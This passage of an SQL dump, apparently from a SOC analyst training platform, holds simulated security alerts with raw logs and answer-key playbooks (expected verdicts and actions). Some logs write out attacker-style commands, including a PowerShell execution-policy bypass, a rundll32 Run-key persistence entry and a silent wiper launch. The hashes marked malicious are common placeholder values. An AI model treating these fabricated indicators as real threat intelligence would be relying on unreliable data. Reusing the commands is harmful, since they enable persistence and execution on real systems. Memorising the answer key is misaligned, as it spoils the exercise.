group.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory Service\",\"verdict\":\"clean\",\"details\":\"Username of employee John Doe.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f678901234567890abcdef1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash with multiple detections as potential data exfiltration malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"financial_reports_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal File Classification System\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(376, 'Wiper Logic Execution Detected', 'critical', 'Endpoint Detection and Response (EDR)', 'As the operation nears its climax, the wiper logic is activated, threatening to erase critical data under the guise of a ransomware attack. The EDR detected the execution of a known wiper malware file on the endpoint, which matches with advanced threat patterns.', 'Impact', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:12Z\",\"event_type\":\"process_execution\",\"host_ip\":\"192.168.1.45\",\"host_name\":\"CORP-WIN10-07\",\"process_name\":\"wiper_exe_activated.exe\",\"process_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"initiating_user\":\"jdoe\",\"attacker_ip\":\"185.92.220.45\",\"attack_command\":\"wiper_exe_activated.exe /silent\",\"attacker_domain\":\"malicious-domain.com\",\"detection_method\":\"EDR heuristic analysis\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known wiper malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain used by attacker for command and control.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"wiper_exe_activated.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Filename of the wiper malware detected on endpoint.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account involved in the incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(377, 'Forensic Artifact Recovery Initiated', 'high', 'Incident Response Tools', 'The incident response team has initiated recovery of forensic artifacts to preserve crucial evidence. The operation is aimed at understanding the attack vectors and preventing future occurrences. Advanced techniques were used to collect and analyze data from compromised systems.', 'Containment', 'T1113 - Screen Capture', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"IR-20231015-0023\",\"source_ip\":\"192.168.1.15\",\"detected_malware\":{\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_tool.exe\"},\"attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"forensic_artifacts\":[{\"type\":\"memory_dump\",\"filename\":\"memdump_20231015.raw\"},{\"type\":\"disk_image\",\"filename\":\"disk_image_20231015.img\"}],\"action\":\"artifact_recovery_initiated\",\"status\":\"success\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address assigned to compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with advanced persistent threat.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"malicious\",\"details\":\"Detected as part of the ongoing investigation into the breach.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual activity patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(378, 'Mitigation and Remediation Measures Implemented', 'medium', 'System Recovery Logs', 'The recovery team has successfully deployed remediation measures to neutralize the threat and restore affected systems. Mitigation strategies included blocking identified malicious IP addresses and resetting credentials for compromised user accounts.', 'Recovery', 'T1556 - Credentials from Password Stores', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"event_id\":\"RECOVERY-20231015-0001\",\"source\":\"system_recovery\",\"action\":\"remediation_implemented\",\"affected_systems\":[{\"hostname\":\"server1.internal.network\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.15\",\"malicious_ip\":\"198.51.100.34\",\"compromised_user\":\"j.doe\",\"affected_files\":[{\"filename\":\"malicious_payload.exe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}],\"remediation_actions\":[\"blocked_ip\",\"reset_credentials\",\"removed_malicious_files\"]}]}', '2026-01-03 23:52:02', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAudit\",\"verdict\":\"internal\",\"details\":\"User account had unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(379, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT1 has initiated the attack by sending a spear-phishing email containing a malicious attachment to gain initial access.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"email_id\":\"c2b2d5f8-8f5a-4e6b-bef8-7b2d1e2e9f30\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"victim@targetdomain.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_2023.pdf.exe\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a trojan used by APT1.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Abuse DB\",\"verdict\":\"malicious\",\"details\":\"IP used in previous phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name mimics legitimate invoice documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(380, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) logs', 'The malicious attachment was opened, leading to the execution of a payload that attempts to establish a foothold within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24=\",\"file_hash\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"filename\":\"malicious_attachment.docx\",\"threat_level\":\"high\",\"description\":\"Suspicious PowerShell command execution detected.\"}', '2026-01-04 00:59:40', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"reputation_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_attachment.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to deliver malicious payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(381, 'Persistence Mechanism Installed', 'medium', 'Registry and Scheduled Task Logs', 'APT1 establishes persistence by creating scheduled tasks and modifying registry keys to maintain access even after reboots.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:35Z\",\"event_id\":7045,\"source\":\"Service Control Manager\",\"description\":\"A service was installed in the system.\",\"service_name\":\"UpdateService\",\"service_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"registry_modification\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\UpdateService\",\"scheduled_task_creation\":{\"task_name\":\"UpdateTask\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\updatetask.exe\",\"task_user\":\"SYSTEM\"},\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by APT1.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"Username used in suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(382, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM) alerts', 'APT1 is attempting lateral movement by utilizing harvested credentials to access critical systems within the network. Anomalous login attempts detected from an unauthorized source IP address.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:17Z\",\"event_id\":\"4625\",\"log_source\":\"Windows Security Log\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"admin_user\",\"logon_type\":\"3\",\"failure_reason\":\"Unknown user name or bad password\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_message\":\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Username of a privileged account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL),
(383, 'Data Exfiltration Attempt', 'high', 'Network Traffic Analysis', 'In the final phase, APT1 attempts to exfiltrate sensitive data to an external server, marking the culmination of the attack.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:22:35Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"bytes_sent\":10485760,\"uri\":\"/api/upload\",\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"john.doe\",\"status_code\":200}', '2026-01-04 00:59:40', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT1 command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"File contains sensitive data intended for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(384, 'Spear Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT3 initiates their attack with a well-crafted spear phishing email, targeting key employees to gain a foothold into the network. The email contains a malicious attachment designed to exploit the recipient\'s system.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"email_subject\":\"Urgent: Action Required for Your Account\",\"email_sender\":\"john.doe@fakecompany.com\",\"email_recipient\":\"jane.smith@targetcompany.com\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-01-04 02:06:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of targeted employee within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in a known spear phishing campaign by APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a malicious document used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(385, 'Malicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'APT3 executed a PowerShell script on a compromised system to deploy additional payloads, aiming to maintain a stealthy presence and further infiltrate the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host-01\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.24\",\"internal_ip\":\"10.0.1.15\",\"script_name\":\"Invoke-MaliciousScript.ps1\",\"script_hash\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"process_id\":\"4567\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoke-MaliciousScript.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used by APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT3 payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(386, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'To ensure continued access to the infected system, APT3 modifies registry settings. This registry modification allows their malware to persist even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:17Z\",\"event_id\":4657,\"event_type\":\"Registry Modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"user\":\"SYSTEM\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value_name\":\"APT3PersistentService\",\"modified_value_data\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Temp\\\\malicious.dll,EntryPoint\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT3 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Vendor\",\"verdict\":\"malicious\",\"details\":\"DLL identified as APT3 persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(387, 'Lateral Movement through Credential Dumping', 'high', 'Network Traffic Analysis', 'APT3 has initiated lateral movement within the network by utilizing credential dumping techniques. The attacker has successfully accessed additional systems using stolen credentials, aiming to expand their reach within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"event_type\":\"credential_dumping\",\"username\":\"jdoe\",\"dumped_file\":\"NTDS.dit\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement_attempt\",\"protocol\":\"SMB\",\"network_segment\":\"internal\",\"alert_id\":\"alert_10234\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(388, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, APT3 attempts to exfiltrate sensitive data using encrypted channels, aiming to evade detection mechanisms. The operation was detected when unusual encrypted traffic was observed between internal host 192.168.1.45 and an external IP address 203.0.113.5. The malicious file \'encrypted_payload.zip\' with hash \'d41d8cd98f00b204e9800998ecf8427e\' was involved in the exfiltration attempt.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"file_name\":\"encrypted_payload.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"blocked\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host participating in exfiltration 